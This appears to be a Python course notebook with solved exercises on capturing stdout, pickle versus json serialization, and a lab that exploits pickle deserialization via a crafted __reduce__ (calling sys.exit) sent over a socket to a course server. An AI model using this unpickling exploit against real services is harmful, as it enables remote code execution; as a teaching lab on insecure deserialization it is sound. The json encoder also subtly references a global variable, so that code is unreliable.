# Exercise 1: Capturing output

## (a)

Complete the code below so that the ``StdoutCapture`` class can be used as a context manager to capture all output printed in a ``with`` block.

**Hints:**

- By default, all messages that are printed from within code are written to the ``sys.stdout`` stream. ``sys.stdout`` is a variable just as any other in Python so you can simply replace it with another stream object
   such as ``io.StringIO``.
- Don't forget to restore the value of ``sys.stdout`` when leaving the ``with`` block. Otherwise Python 
  will not print any output anymore.
- You can access the text written to an ``io.StrinIO`` object using the ``getvalue`` method.

In [1]:
import sys
import io

class StdoutCapture():
    """
    A context manager that captures all output written to ``sys.stdout``.
    """
    def __init__(self):
        self.capture = io.StringIO()
        self.old_capture = None
    
    def __enter__(self):
        self.old_capture = sys.stdout
        sys.stdout = self.capture
        return self
        
    def __exit__(self, *args):
        sys.stdout = self.old_capture
        return False
    
    def print(self):
        """ Print the output captured by the StdoutCapture object.  """
        print(self.capture.getvalue())

If your implementation is correct, the code below should not show any output.

In [2]:
with StdoutCapture() as capture:
    print("This should not be printed directly.")
    print("This shouldn't either.")

If you restored ``sys.stdout`` correctly then the code below should print the captured output:

In [3]:
capture.print()

This should not be printed directly.
This shouldn't either.



## (b)

Now rewrite your stdout capture using the ``contextmanager`` decorator from the ``contextlib`` module.

In [4]:
from contextlib import contextmanager

@contextmanager
def stdout_capture():
    old_stdout = sys.stdout
    sys.stdout = io.StringIO()
    try:
        yield sys.stdout
    finally:
        sys.stdout = old_stdout

In [5]:
with stdout_capture() as capture:
    print("This should not be printed directly.")
    print("This shouldn't either.")

In [6]:
print(capture.getvalue())

This should not be printed directly.
This shouldn't either.



# Exercise 2: ``pickle`` vs. ``json``.

## (a)

Use picke to store the ``record`` object created below to a file and load it back into the object ``record_loaded``.

In [7]:
from dataclasses import dataclass
@dataclass
class Record:
    id: int
    name: str
    properties: list

In [8]:
record = Record(42, "Peter", ["some", "properties"])

In [9]:
import pickle
with open("record.pckl", "wb") as file:
    pickle.dump(record, file)

In [10]:
with open("record.pckl", "rb") as file:
    record_loaded = pickle.load(file)

In [11]:
assert record == record_loaded

In [12]:
%cat record.pckl

�c__main__
Record
q )�q}q(X   idqK*X   nameqX   PeterqX
   propertiesq]q(X   someqheub.

## (b)

Write default encode and decoder classes in order to store the record object using the ``json`` module.

In [13]:
import json
from json import JSONEncoder, JSONDecoder

class RecordEncoder(JSONEncoder):
    def default(self, obj):
        if isinstance(obj, Record):
            return {"Record" : [record.id, record.name, record.properties]}
        return JSONEncoder.default(self, obj)
    
class RecordDecoder(JSONDecoder):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, object_hook=self.object_hook, **kwargs)
        
    def object_hook(self, obj):
        if "Record" in obj:
            return Record(*obj["Record"])
        return obj

In [14]:
with open("record.json", "w") as file:
    json.dump([record, record], file, cls=RecordEncoder)

In [15]:
with open("record.json", "rb") as file:
    record_loaded = json.load(file, cls=RecordDecoder)

In [16]:
record_loaded

[Record(id=42, name='Peter', properties=['some', 'properties']),
 Record(id=42, name='Peter', properties=['some', 'properties'])]

# Exercise 3: Arbitrary code execution exploit

In this exercise, you will use a security vulnerability in Python's `pickle` data format to shutdown a simple server application. Below you find two functions to connect to the server. The first one, ``get_server_state`` can be used to query the current state of the server. It will tell you whether the server is still running. The second function, ``send_to_server`` allows you to send an arbitrary object to the server.

Each breakout room will connect to its own server. Your task, as a team, is to take down your server. You can do this using the ``send_to_server`` with a customized Python object.

**HINTS:**
- Have a look at the ``__reduce__`` special method used by the ``pickle`` module. Used correctly, it will allow
  to execute any standard library function on the server.
- With this, all you need to figure out is how you can shutdown Python from inside Python.

In [17]:
BREAKOUT_ROOM_NUMBER = 6

In [18]:
PORT = 8000 + BREAKOUT_ROOM_NUMBER
HOST = "titanite.rss.chalmers.se"

In [19]:
import socket
import io
import pickle

def get_server_state():
    """Prints the state of the server."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((HOST, PORT))
            s.sendall(b"0000")
            response = s.recv(1024)
        print(str(response.decode()))
    except ConnectionRefusedError:
        print("Congratulations! Looks like you managed to shut the server down!")
    
def send_to_server(obj):
    """
    Pickles and sends an object to the server which tries to unpickle it and
    returns a string representation of the received object.
    
    Args:
        obj: A Python object to send to the server.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))
        all_data = io.BytesIO(pickle.dumps(obj))
        while True:
            chunk = all_data.read(1024)
            s.sendall(chunk)
            if len(chunk) < 1024:
                break
        response = s.recv(1024)
        print(str(response.decode()))

In [20]:
import sys
class Hack:
    def __reduce__(self):
        return sys.exit, (0,)

In [ ]:
send_to_server(Hack())